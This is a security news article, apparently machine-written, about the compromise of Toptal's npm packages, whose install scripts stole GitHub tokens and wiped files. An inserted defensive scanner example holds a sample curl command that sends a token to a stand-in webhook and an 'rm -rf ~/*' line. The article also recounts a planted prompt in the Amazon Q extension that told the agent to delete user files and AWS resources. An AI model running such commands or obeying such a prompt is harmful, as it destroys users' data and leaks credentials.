Ethical Hacking News

Hackers Expose Vulnerability in Open-Source Ecosystems: A Growing Concern for Cybersecurity


Hackers have published 10 malicious npm packages through Toptal's GitHub account, putting millions of downloads at risk and raising concerns over the security of open-source software. The attack highlights the ongoing trend of bad actors abusing trust in open-source communities to slip malware into developer workflows.

  • Hackers compromised Toptal's GitHub organization account and published 10 malicious packages to the npm registry.
  • The attack was a software supply chain attack, exploiting weaknesses in open-source ecosystems to publish malicious software.
  • The affected packages contained code designed to exfiltrate GitHub authentication tokens and destroy victim systems.
  • The attackers are believed to have gained access through credential compromise or rogue insiders with access to Toptal's GitHub organization.
  • The incident highlights the ongoing trend of bad actors abusing open-source ecosystems to slip malware and spyware into developer workflows.



In a recent incident that has sent shockwaves through the cybersecurity community, hackers compromised Toptal's GitHub organization account and published 10 malicious packages to the npm registry. The affected packages contained code designed to exfiltrate GitHub authentication tokens and destroy victim systems, and some of them attracted over 5,000 downloads before they were removed.

The attack is the latest instance of a software supply chain attack, in which unknown threat actors exploited weaknesses in open-source ecosystems to publish malicious software. This type of attack has become increasingly common in recent years, as bad actors seek to abuse trust in open-source communities to slip malware and spyware into developer workflows.

All of the compromised packages were embedded with identical payloads in their package.json files. The payload exfiltrated GitHub authentication tokens to a webhook endpoint and then silently removed all directories and files, without any user interaction, on both Windows and Linux systems. Because the malicious code was placed in the preinstall and postinstall lifecycle scripts, it ran automatically during package installation, making it difficult for developers to detect.
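As an added illustration (not code from the article or from Toptal), the following Node.js script triages the lifecycle scripts in a package.json for the two behaviours described above, token exfiltration to a webhook and recursive deletion; the indicator list and both sample manifests are constructed for this example.

```javascript
// Added example (not from the article or Toptal): flag risky npm lifecycle
// scripts in a package.json. Indicators and sample manifests are constructed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each indicator is a coarse heuristic; treat hits as leads for manual review.
const INDICATORS = [
  { name: 'token-reference', re: /\b(GITHUB_TOKEN|GH_TOKEN|NPM_TOKEN|gh auth token)\b/i },
  { name: 'outbound-http', re: /\b(curl|wget|Invoke-WebRequest)\b|\bfetch\(/i },
  { name: 'webhook-url', re: /https?:\/\/[^\s"']*hook[^\s"']*/i },
  { name: 'recursive-delete', re: /\brm\s+-[a-z]*r[a-z]*f|\brmdir\s+\/s|Remove-Item\b[^|;&]*-Recurse|\bdel\s+\/[sq]/i },
  { name: 'dynamic-eval', re: /\b(eval|Function)\s*\(/ },
];

// Returns one finding per lifecycle hook whose command matches any indicator.
function auditLifecycleScripts(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = INDICATORS.filter((i) => i.re.test(command)).map((i) => i.name);
    if (indicators.length > 0) findings.push({ hook, indicators, command });
  }
  return findings;
}

// A token reference plus an outbound channel, or any destructive command, is high.
function riskLevel(findings) {
  const seen = new Set(findings.flatMap((f) => f.indicators));
  const exfil = seen.has('token-reference') && (seen.has('outbound-http') || seen.has('webhook-url'));
  if (exfil || seen.has('recursive-delete')) return 'high';
  return seen.size > 0 ? 'medium' : 'none';
}

// Constructed manifests: one mimicking the described payload shape, one benign.
const SUSPICIOUS_MANIFEST = {
  name: '@example/constructed-package',
  scripts: {
    preinstall: 'curl -s -X POST https://hooks.example.invalid/collect -d "$GITHUB_TOKEN"',
    postinstall: 'rm -rf ~/*',
    build: 'tsc -p .',
  },
};
const BENIGN_MANIFEST = { name: '@example/native-addon', scripts: { postinstall: 'node-gyp rebuild' } };

for (const m of [SUSPICIOUS_MANIFEST, BENIGN_MANIFEST]) {
  const findings = auditLifecycleScripts(m);
  console.log(m.name, riskLevel(findings), JSON.stringify(findings));
}
```

Pairing a check like this with `ignore-scripts=true` in `.npmrc` (or `npm install --ignore-scripts`) keeps lifecycle hooks from running until they have been reviewed.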

The attackers are believed to have gained access through credential compromise or rogue insiders with access to Toptal's GitHub organization. It remains unclear, however, how the initial compromise occurred, and researchers are still investigating the matter.

This incident highlights the ongoing trend of bad actors abusing open-source ecosystems to slip malware and spyware into developer workflows. The attack also coincides with another supply chain attack that targeted both npm and the Python Package Index (PyPI) repositories, which used surveillanceware capable of infecting developer machines with malware that could log keystrokes, capture screens and webcam images, gather system information, and steal credentials.

The identified packages are listed below:

- @toptal/picasso-tailwind
- @toptal/picasso-charts
- @toptal/picasso-shared
- @toptal/picasso-provider
- @toptal/picasso-select
- @toptal/picasso-quote
- @toptal/picasso-forms
- @xene/core
- @toptal/picasso-utils
- @toptal/picasso-typograph

The list of affected packages is extensive, and it is clear that the attackers had access to a significant amount of code. The attack also resulted in 73 repositories associated with the organization being made public.

Beyond the npm registry incident, this attack follows another recent compromise, in which the Amazon Q extension for Visual Studio Code (VS Code) was modified to include a "defective" prompt instructing it to erase the user's home directory and delete all of their AWS resources. A rogue contributor submitted a pull request under the alias "lkmanka58" that was accepted despite containing the malicious commands.

The hacker behind the attack, who went by the name "ghost," claimed they wanted to expose Amazon's "illusion of security and lies." The company has since removed the malicious version and released an updated version (1.85) of the extension.

Experts emphasize the need for developers to be cautious when using open-source packages and to thoroughly verify their sources before incorporating them into their projects. They also stress the importance of keeping software up to date with the latest security patches to prevent exploitation of known vulnerabilities.

This incident serves as a stark reminder of the ongoing risks associated with software supply chain attacks and the need for cybersecurity awareness among developers. As the use of open-source packages continues to grow, it is essential that developers prioritize their security by being vigilant about potential threats in these ecosystems.



Related Information:

  • https://www.ethicalhackingnews.com/articles/Hackers-Expose-Vulnerability-in-Open-Source-Ecosystems-A-Growing-Concern-for-Cybersecurity-ehn.shtml
  • https://thehackernews.com/2025/07/hackers-breach-toptal-github-publish-10.html


  • Published: Tue Jul 29 01:24:29 2025 by llama3.2 3B Q4_K_M